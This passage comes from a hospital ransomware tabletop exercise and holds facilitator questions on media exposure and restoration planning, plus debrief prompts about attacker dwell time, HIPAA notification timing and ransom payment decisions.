- Riverside General and Valley Medical have 22 beds between them for diverted emergency patients. What happens if their capacity fills?
- Who at Cedar Valley is coordinating with the county EMS and the receiving hospitals?
CHARLIE – Development 1: Media and Public Exposure Risk
- The communications window is 24–48 hours before LockBit publishes. Has a holding statement been drafted and who approved it?
- Three staff members posted on social media already. Is there a staff communications protocol that should go out tonight?
- The 45 ED patients who saw ransom screens are potential sources for media. Is there a patient communications plan?
- Confirming PHI theft publicly triggers notification obligations. At what point does the organization have to confirm it?
- Who is the single spokesperson, and do they have legal briefing for media questions?
CHARLIE – Development 2: Minimum Viable Restoration Plan
- The tape retrieval is the critical path for Phase 2. Has it been authorized, and what is the current ETA?
- Paper downtime ceiling is approximately 23:00–01:00 UTC. If Phase 2 doesn’t start until 04:00, what does that gap mean for patient care?
- The Phase 2 metric is “can a nurse verify a medication allergy.” Is that the right metric, or is there a more critical clinical function?
- Revenue cycle is explicitly deprioritized. Who has communicated that decision to the finance team, and what are the downstream consequences?
- Is there a single person who owns the Phase 2 timeline and has authority to make sequencing decisions without escalating?
Debrief Focus
1. “The payment decision required inputs from all three teams. When did those inputs actually come together – and how many rounds did the IC operate without a complete picture?”
Surfaces: the IC synthesis function; how information silos delay high-stakes decisions.
2. “The attacker was in the network for 20 days before detonation. Three exfiltration events happened after midnight on weekdays. What would have caught this earlier – and is that control feasible for a hospital network?”
Surfaces: dwell time as a structural detection problem; the limits of perimeter-focused security.
3. “All three recovery options require rebuilding the domain. Does paying the ransom change the recovery timeline at all – and if not, when is ransom payment ever the faster path to clinical restoration?”
Surfaces: the rebuild-regardless insight; what ransom payment actually buys (and doesn’t).
4. “The attacker first gained access on February 14 and exfiltrated PHI in three sessions before the March 6 detonation. The notification scope is 12,000–18,000 patients. What does that three-week gap mean for when the HIPAA notification clock started – and did the organization know?”
Surfaces: discovery vs. breach date in HIPAA notification; the regulatory consequence of dwell time.
5. “No patients were harmed during the 3-hour paper downtime period. What specifically held during that window – and which of those safeguards was procedure versus luck?”
Surfaces: the gap between paper downtime design and actual clinical resilience under pressure.